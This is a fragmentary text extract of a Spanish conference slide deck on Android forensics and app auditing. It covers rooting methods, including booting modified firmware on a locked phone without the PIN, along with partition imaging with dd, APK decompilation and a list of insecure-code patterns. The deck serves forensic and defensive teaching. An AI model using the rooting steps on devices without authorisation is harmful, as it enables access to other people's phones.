![Page 61: FEEL FREE - UPMapolo.eui.upm.es/descarga/ConferenciaJuanAntonioCallesTASSI201… · a) Los ordenadores, dispositivos electrónicos, sistemas informáticos o parte de los mismos, medios](https://reader030.vdocuments.pub/reader030/viewer/2022040606/5eb17de996869170f04f18f4/html5/thumbnails/61.jpg)
60
![Page 62: FEEL FREE - UPMapolo.eui.upm.es/descarga/ConferenciaJuanAntonioCallesTASSI201… · a) Los ordenadores, dispositivos electrónicos, sistemas informáticos o parte de los mismos, medios](https://reader030.vdocuments.pub/reader030/viewer/2022040606/5eb17de996869170f04f18f4/html5/thumbnails/62.jpg)
61
![Page 63: FEEL FREE - UPMapolo.eui.upm.es/descarga/ConferenciaJuanAntonioCallesTASSI201… · a) Los ordenadores, dispositivos electrónicos, sistemas informáticos o parte de los mismos, medios](https://reader030.vdocuments.pub/reader030/viewer/2022040606/5eb17de996869170f04f18f4/html5/thumbnails/63.jpg)
62
![Page 64: FEEL FREE - UPMapolo.eui.upm.es/descarga/ConferenciaJuanAntonioCallesTASSI201… · a) Los ordenadores, dispositivos electrónicos, sistemas informáticos o parte de los mismos, medios](https://reader030.vdocuments.pub/reader030/viewer/2022040606/5eb17de996869170f04f18f4/html5/thumbnails/64.jpg)
63
7.- Conectar el móvil y comprobar instalación
8.- Reiniciar
9.- Conectar móvil con modo depuración USB activado
![Page 65: FEEL FREE - UPMapolo.eui.upm.es/descarga/ConferenciaJuanAntonioCallesTASSI201… · a) Los ordenadores, dispositivos electrónicos, sistemas informáticos o parte de los mismos, medios](https://reader030.vdocuments.pub/reader030/viewer/2022040606/5eb17de996869170f04f18f4/html5/thumbnails/65.jpg)
64
•
•
•
•
![Page 66: FEEL FREE - UPMapolo.eui.upm.es/descarga/ConferenciaJuanAntonioCallesTASSI201… · a) Los ordenadores, dispositivos electrónicos, sistemas informáticos o parte de los mismos, medios](https://reader030.vdocuments.pub/reader030/viewer/2022040606/5eb17de996869170f04f18f4/html5/thumbnails/66.jpg)
65
•
• Muestra si el móvil está conectado
• Por si ha habido algún problema
• Instala/desinstala aplicaciones en el terminal
• Arranca una shell dentro del terminal
• Intercambia archivos
![Page 67: FEEL FREE - UPMapolo.eui.upm.es/descarga/ConferenciaJuanAntonioCallesTASSI201… · a) Los ordenadores, dispositivos electrónicos, sistemas informáticos o parte de los mismos, medios](https://reader030.vdocuments.pub/reader030/viewer/2022040606/5eb17de996869170f04f18f4/html5/thumbnails/67.jpg)
66
$
![Page 68: FEEL FREE - UPMapolo.eui.upm.es/descarga/ConferenciaJuanAntonioCallesTASSI201… · a) Los ordenadores, dispositivos electrónicos, sistemas informáticos o parte de los mismos, medios](https://reader030.vdocuments.pub/reader030/viewer/2022040606/5eb17de996869170f04f18f4/html5/thumbnails/68.jpg)
67
•
•
• : Uso de software como SuperOneClick o ExynosAbuse• : Root a través de recovery
•
![Page 69: FEEL FREE - UPMapolo.eui.upm.es/descarga/ConferenciaJuanAntonioCallesTASSI201… · a) Los ordenadores, dispositivos electrónicos, sistemas informáticos o parte de los mismos, medios](https://reader030.vdocuments.pub/reader030/viewer/2022040606/5eb17de996869170f04f18f4/html5/thumbnails/69.jpg)
68
ANDROID 2.X
•
•
•
•
![Page 70: FEEL FREE - UPMapolo.eui.upm.es/descarga/ConferenciaJuanAntonioCallesTASSI201… · a) Los ordenadores, dispositivos electrónicos, sistemas informáticos o parte de los mismos, medios](https://reader030.vdocuments.pub/reader030/viewer/2022040606/5eb17de996869170f04f18f4/html5/thumbnails/70.jpg)
69
ANDROID 2.X
![Page 71: FEEL FREE - UPMapolo.eui.upm.es/descarga/ConferenciaJuanAntonioCallesTASSI201… · a) Los ordenadores, dispositivos electrónicos, sistemas informáticos o parte de los mismos, medios](https://reader030.vdocuments.pub/reader030/viewer/2022040606/5eb17de996869170f04f18f4/html5/thumbnails/71.jpg)
70
ANDROID 4.X
1. Formatear una tarjeta micro sd a FAT32
2. Desplegar en la tarjeta el firmware modificado uberoid 1.0
(http://ul.to/fd3flqnp) o 2.0 (http://ul.to/s8a7j1zr)
3. Introducir la tarjeta en el terminal apagado y encender (tened en
cuenta que no sabremos el PIN)
4. Ya eres root
![Page 72: FEEL FREE - UPMapolo.eui.upm.es/descarga/ConferenciaJuanAntonioCallesTASSI201… · a) Los ordenadores, dispositivos electrónicos, sistemas informáticos o parte de los mismos, medios](https://reader030.vdocuments.pub/reader030/viewer/2022040606/5eb17de996869170f04f18f4/html5/thumbnails/72.jpg)
71
ANDROID 4.X
1. Permitir la instalación de apps de fuera de Play Store.
2. Ir a https://towelroot.com/ y descargar la aplicación3. Ejecutar y “make it ra1n”4. Esperar y tras el reinicio el terminal está rooteado.
No funciona en terminales HTC y Motorola.
![Page 73: FEEL FREE - UPMapolo.eui.upm.es/descarga/ConferenciaJuanAntonioCallesTASSI201… · a) Los ordenadores, dispositivos electrónicos, sistemas informáticos o parte de los mismos, medios](https://reader030.vdocuments.pub/reader030/viewer/2022040606/5eb17de996869170f04f18f4/html5/thumbnails/73.jpg)
72
#
![Page 74: FEEL FREE - UPMapolo.eui.upm.es/descarga/ConferenciaJuanAntonioCallesTASSI201… · a) Los ordenadores, dispositivos electrónicos, sistemas informáticos o parte de los mismos, medios](https://reader030.vdocuments.pub/reader030/viewer/2022040606/5eb17de996869170f04f18f4/html5/thumbnails/74.jpg)
73
• A través de DD– dd if=/dev/mtd/mtd1ro of=/sdcard/mtd1ro.dd bs=4096
![Page 75: FEEL FREE - UPMapolo.eui.upm.es/descarga/ConferenciaJuanAntonioCallesTASSI201… · a) Los ordenadores, dispositivos electrónicos, sistemas informáticos o parte de los mismos, medios](https://reader030.vdocuments.pub/reader030/viewer/2022040606/5eb17de996869170f04f18f4/html5/thumbnails/75.jpg)
74
• Memory Technology Device (MTD): Subsistema Linux utilizado en medios flashcomo en móviles.
• IDE (/dev/hd* = hard drive)
• SCSI o SATA (/dev/sd*)
• MTD (/dev/mtd*)
• Podemos obtener más información de los dispositivos inspeccionando /dev y/proc
YAFFSCaso de los antiguos sistemas Android
![Page 76: FEEL FREE - UPMapolo.eui.upm.es/descarga/ConferenciaJuanAntonioCallesTASSI201… · a) Los ordenadores, dispositivos electrónicos, sistemas informáticos o parte de los mismos, medios](https://reader030.vdocuments.pub/reader030/viewer/2022040606/5eb17de996869170f04f18f4/html5/thumbnails/76.jpg)
75
YAFFS
![Page 77: FEEL FREE - UPMapolo.eui.upm.es/descarga/ConferenciaJuanAntonioCallesTASSI201… · a) Los ordenadores, dispositivos electrónicos, sistemas informáticos o parte de los mismos, medios](https://reader030.vdocuments.pub/reader030/viewer/2022040606/5eb17de996869170f04f18f4/html5/thumbnails/77.jpg)
76
EXT
Particiones:
Correspondencia de particiones y puntos de montaje:
![Page 78: FEEL FREE - UPMapolo.eui.upm.es/descarga/ConferenciaJuanAntonioCallesTASSI201… · a) Los ordenadores, dispositivos electrónicos, sistemas informáticos o parte de los mismos, medios](https://reader030.vdocuments.pub/reader030/viewer/2022040606/5eb17de996869170f04f18f4/html5/thumbnails/78.jpg)
77
![Page 79: FEEL FREE - UPMapolo.eui.upm.es/descarga/ConferenciaJuanAntonioCallesTASSI201… · a) Los ordenadores, dispositivos electrónicos, sistemas informáticos o parte de los mismos, medios](https://reader030.vdocuments.pub/reader030/viewer/2022040606/5eb17de996869170f04f18f4/html5/thumbnails/79.jpg)
78
![Page 80: FEEL FREE - UPMapolo.eui.upm.es/descarga/ConferenciaJuanAntonioCallesTASSI201… · a) Los ordenadores, dispositivos electrónicos, sistemas informáticos o parte de los mismos, medios](https://reader030.vdocuments.pub/reader030/viewer/2022040606/5eb17de996869170f04f18f4/html5/thumbnails/80.jpg)
79
![Page 81: FEEL FREE - UPMapolo.eui.upm.es/descarga/ConferenciaJuanAntonioCallesTASSI201… · a) Los ordenadores, dispositivos electrónicos, sistemas informáticos o parte de los mismos, medios](https://reader030.vdocuments.pub/reader030/viewer/2022040606/5eb17de996869170f04f18f4/html5/thumbnails/81.jpg)
80
• En las tarjetas SD no se almacena la información del sistema
• Se almacenan datos de usuario como archivos grandes, multimedia, fotos,
vídeos, etc.
• El proceso de extracción es bastante sencillo y se centra en el uso de
ciertas herramientas.
![Page 82: FEEL FREE - UPMapolo.eui.upm.es/descarga/ConferenciaJuanAntonioCallesTASSI201… · a) Los ordenadores, dispositivos electrónicos, sistemas informáticos o parte de los mismos, medios](https://reader030.vdocuments.pub/reader030/viewer/2022040606/5eb17de996869170f04f18f4/html5/thumbnails/82.jpg)
81
1. Extraeremos la tarjeta SD/MicroSD/MiniSD del terminal
2. La insertaremos en un lector de tarjetas, mapeándola como solo lecturapara no dañar la evidencia
3. La clonaremos con dd u otra herramienta y calcularemos el hash
4. Analizaremos el clon de la tarjeta con herramientas como Autopsy o FTKImager
![Page 83: FEEL FREE - UPMapolo.eui.upm.es/descarga/ConferenciaJuanAntonioCallesTASSI201… · a) Los ordenadores, dispositivos electrónicos, sistemas informáticos o parte de los mismos, medios](https://reader030.vdocuments.pub/reader030/viewer/2022040606/5eb17de996869170f04f18f4/html5/thumbnails/83.jpg)
82
![Page 84: FEEL FREE - UPMapolo.eui.upm.es/descarga/ConferenciaJuanAntonioCallesTASSI201… · a) Los ordenadores, dispositivos electrónicos, sistemas informáticos o parte de los mismos, medios](https://reader030.vdocuments.pub/reader030/viewer/2022040606/5eb17de996869170f04f18f4/html5/thumbnails/84.jpg)
83
•
•
•
![Page 85: FEEL FREE - UPMapolo.eui.upm.es/descarga/ConferenciaJuanAntonioCallesTASSI201… · a) Los ordenadores, dispositivos electrónicos, sistemas informáticos o parte de los mismos, medios](https://reader030.vdocuments.pub/reader030/viewer/2022040606/5eb17de996869170f04f18f4/html5/thumbnails/85.jpg)
84
![Page 86: FEEL FREE - UPMapolo.eui.upm.es/descarga/ConferenciaJuanAntonioCallesTASSI201… · a) Los ordenadores, dispositivos electrónicos, sistemas informáticos o parte de los mismos, medios](https://reader030.vdocuments.pub/reader030/viewer/2022040606/5eb17de996869170f04f18f4/html5/thumbnails/86.jpg)
85
![Page 87: FEEL FREE - UPMapolo.eui.upm.es/descarga/ConferenciaJuanAntonioCallesTASSI201… · a) Los ordenadores, dispositivos electrónicos, sistemas informáticos o parte de los mismos, medios](https://reader030.vdocuments.pub/reader030/viewer/2022040606/5eb17de996869170f04f18f4/html5/thumbnails/87.jpg)
86
• Si descomprimimos el fichero .apk y abrimos elfichero AndroidManifest.xml, no veremos nadaporque está codificado.
• Pasos a seguir:
1. Descargar la herramienta apktool
2. Copiar el archivo .apk en la carpeta raíz
3. Introducir el comando:
apktool d NombreApp.apk ./RutaSalida
Ej. apktool.bat d facebook.apk fbook
![Page 88: FEEL FREE - UPMapolo.eui.upm.es/descarga/ConferenciaJuanAntonioCallesTASSI201… · a) Los ordenadores, dispositivos electrónicos, sistemas informáticos o parte de los mismos, medios](https://reader030.vdocuments.pub/reader030/viewer/2022040606/5eb17de996869170f04f18f4/html5/thumbnails/88.jpg)
87
Extraer el código fuente de la aplicación a partir del fichero .apk
En el proceso de empaquetado:
Para el proceso de reversing
![Page 89: FEEL FREE - UPMapolo.eui.upm.es/descarga/ConferenciaJuanAntonioCallesTASSI201… · a) Los ordenadores, dispositivos electrónicos, sistemas informáticos o parte de los mismos, medios](https://reader030.vdocuments.pub/reader030/viewer/2022040606/5eb17de996869170f04f18f4/html5/thumbnails/89.jpg)
88
PASO 1:
Procedimiento:
Copiar el fichero .apk en la raíz de dex2jar
Abrir un cmd y situarse en la ruta anterior
Ejecutar el comando dex2jar nombreAplicacion.apk
![Page 90: FEEL FREE - UPMapolo.eui.upm.es/descarga/ConferenciaJuanAntonioCallesTASSI201… · a) Los ordenadores, dispositivos electrónicos, sistemas informáticos o parte de los mismos, medios](https://reader030.vdocuments.pub/reader030/viewer/2022040606/5eb17de996869170f04f18f4/html5/thumbnails/90.jpg)
89
PASO 2:
Procedimiento:
Instalar JD-Gui y abrir el fichero .jar obtenido en el paso anterior
Guardar todas los ficheros de código fuente en la ruta deseada
![Page 91: FEEL FREE - UPMapolo.eui.upm.es/descarga/ConferenciaJuanAntonioCallesTASSI201… · a) Los ordenadores, dispositivos electrónicos, sistemas informáticos o parte de los mismos, medios](https://reader030.vdocuments.pub/reader030/viewer/2022040606/5eb17de996869170f04f18f4/html5/thumbnails/91.jpg)
90
Identifica aplicaciones inseguras o maliciosas.
Búsqueda estratégica de fragmentos de código.
Especial hincapié en aspectos potencialmente inseguros:
Preferencias de las aplicaciones
Almacenamiento en la SDCard
Logs
getSharedPreferences()MODE_PRIVATEMODE_WORLD_READABLEMODE_WORD_WRITEABLEaddPreferencesFormResource
getExternalStorageDirectory()sdcard
Log
![Page 92: FEEL FREE - UPMapolo.eui.upm.es/descarga/ConferenciaJuanAntonioCallesTASSI201… · a) Los ordenadores, dispositivos electrónicos, sistemas informáticos o parte de los mismos, medios](https://reader030.vdocuments.pub/reader030/viewer/2022040606/5eb17de996869170f04f18f4/html5/thumbnails/92.jpg)
91
Sentencias JavaScript
SQLite
addJavascriptInterface()setJavaScriptEnabled(true)
dbsqlitedatabaseinsertdeleteselecttablecursorrawQueryin
![Page 93: FEEL FREE - UPMapolo.eui.upm.es/descarga/ConferenciaJuanAntonioCallesTASSI201… · a) Los ordenadores, dispositivos electrónicos, sistemas informáticos o parte de los mismos, medios](https://reader030.vdocuments.pub/reader030/viewer/2022040606/5eb17de996869170f04f18f4/html5/thumbnails/93.jpg)
92
Notificaciones Toast
Debuggable
Identificadores
Toast.makeText
uid, user-id, imei, deviceId, deviceSerialNumber, devicePrint, X-DSN, phone, mdn, did, IMSI, uuid
android:debuggable
![Page 94: FEEL FREE - UPMapolo.eui.upm.es/descarga/ConferenciaJuanAntonioCallesTASSI201… · a) Los ordenadores, dispositivos electrónicos, sistemas informáticos o parte de los mismos, medios](https://reader030.vdocuments.pub/reader030/viewer/2022040606/5eb17de996869170f04f18f4/html5/thumbnails/94.jpg)
93
Tapjacking
Hashes
Conexiones
httphttpsHttpURLConnectionURLConnectionURLTrustAllSSLSocket-FactoryAllTrustSSLSocketFactoryNonValidatingSSLSocketFactory
MD5BASE64des
filterTouchesWhenObscured="true"
Lo que el usuario ve
Lo que realmente esta pasando
![Page 95: FEEL FREE - UPMapolo.eui.upm.es/descarga/ConferenciaJuanAntonioCallesTASSI201… · a) Los ordenadores, dispositivos electrónicos, sistemas informáticos o parte de los mismos, medios](https://reader030.vdocuments.pub/reader030/viewer/2022040606/5eb17de996869170f04f18f4/html5/thumbnails/95.jpg)
94
Intent Injection
Localizacion GPS
Action.getIntent()
getLastKnownLocation()requestLocationUpdates()getLatitude() getLongitude() LOCATION
Aplicación 1
Activity 1 Activity 2 Activity 3
Aplicación 2
Activity 1 Activity 2 Activity 3
intent
intent
intent
![Page 96: FEEL FREE - UPMapolo.eui.upm.es/descarga/ConferenciaJuanAntonioCallesTASSI201… · a) Los ordenadores, dispositivos electrónicos, sistemas informáticos o parte de los mismos, medios](https://reader030.vdocuments.pub/reader030/viewer/2022040606/5eb17de996869170f04f18f4/html5/thumbnails/96.jpg)
95
pero con saber interpretar código java podréis hacer un trabajo importante
(mucho más sencillo que ASM)
![Page 97: FEEL FREE - UPMapolo.eui.upm.es/descarga/ConferenciaJuanAntonioCallesTASSI201… · a) Los ordenadores, dispositivos electrónicos, sistemas informáticos o parte de los mismos, medios](https://reader030.vdocuments.pub/reader030/viewer/2022040606/5eb17de996869170f04f18f4/html5/thumbnails/97.jpg)
96
![Page 98: FEEL FREE - UPMapolo.eui.upm.es/descarga/ConferenciaJuanAntonioCallesTASSI201… · a) Los ordenadores, dispositivos electrónicos, sistemas informáticos o parte de los mismos, medios](https://reader030.vdocuments.pub/reader030/viewer/2022040606/5eb17de996869170f04f18f4/html5/thumbnails/98.jpg)
97
• proyectos nacionales e internacionales
• recibirás formación especializada
•
• Hacking ético (rompiendo y solucionando)
• Cumplimiento normativo (LOPD, ISO27001, …)
• Vigilancia digital (I+D, análisis e inteligencia)
•
• Senior
• Junior
• Becas
•
![Page 99: FEEL FREE - UPMapolo.eui.upm.es/descarga/ConferenciaJuanAntonioCallesTASSI201… · a) Los ordenadores, dispositivos electrónicos, sistemas informáticos o parte de los mismos, medios](https://reader030.vdocuments.pub/reader030/viewer/2022040606/5eb17de996869170f04f18f4/html5/thumbnails/99.jpg)
© 2015 KPMG Asesores S.L., sociedad española de responsabilidad limitada y firma miembro de la redKPMG de firmas independientes afiliadas a KPMG International Cooperative (“KPMG International”),sociedad suiza. Todos los derechos reservados.
KPMG, el logotipo de KPMG y “cutting through complexity” son marcas registradas o comerciales deKPMG International.
Esta propuesta de servicios ha sido realizada por KPMG Asesores, S.L. sociedad española deresponsabilidad limitada y miembro de la red de firmas independientes afiliadas a KPMG International,sociedad suiza, y está sujeta, a todos los efectos, a la negociación, acuerdo y firma de una carta deencargo o contrato específico. KPMG International no presta servicios a clientes. Ninguna filial ofirma miembro tiene autoridad para obligar o vincular a KPMG International o a otra firma miembro conrespecto a terceros ni KPMG International tiene autoridad para obligar o vincular a ninguna firmamiembro.
Contáctanos:
Director – Cyber Security
Fijo: 91 456 59 04Móvil: 666 48 26 51Email: [email protected]
www.kpmg.es | www.kpmgciberseguridad.es
Senior Manager - Cyber Security
Móvil: 608 91 95 03Twitter: @jantonioCallesEmail: [email protected]
Partner – IT Advisory
FIjo: 91 456 38 31Email: [email protected]